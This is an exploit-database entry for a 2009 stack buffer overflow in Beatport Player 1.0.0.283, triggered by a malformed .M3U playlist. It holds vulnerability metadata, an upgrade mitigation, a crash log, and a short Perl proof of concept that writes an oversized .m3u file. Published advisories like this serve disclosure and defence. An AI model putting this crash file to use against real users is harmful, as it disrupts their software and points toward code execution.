header-logo
Suggest Exploit
vendor:
Beatport Player
by:
SirGod
9,3
CVSS
HIGH
Stack Overflow
121
CWE
Product Name: Beatport Player
Affected Version From: 1.0.0.283
Affected Version To: 1.0.0.283
Patch Exists: YES
Related CWE: N/A
CPE: a:beatport:beatport_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow PoC

A stack-based buffer overflow vulnerability exists in Beatport Player 1.0.0.283. The vulnerability is caused due to a boundary error within the processing of .M3U files. This can be exploited to cause a stack-based buffer overflow by tricking a user into opening a specially crafted .M3U file. Successful exploitation may allow execution of arbitrary code.

Mitigation:

Upgrade to the latest version of Beatport Player.
Source

Exploit-DB raw data:

#####################################################################################################
#                   Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow PoC
#                           Discovered by SirGod   -   www.mortal-team.net
# Error log :
#
#         Logged at Friday, May 01, 2009 14:03:17
#         FileVersion: 1.0.0.283
#         ProductVersion: 1.0.0.0
#         Exception Code: 0xC0000005
#         Exception Addr: 0x001B:0x004317F0
#         Exception Module: TraktorBeatport.exe
#         Exception Description: EXCEPTION_ACCESS_VIOLATION, Attempt to read from address 0x000002BC
#         The memory could not be "read"
#	  http://www.brothersoft.com/beatport-player-download-62319.html         
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";

# milw0rm.com [2009-05-01]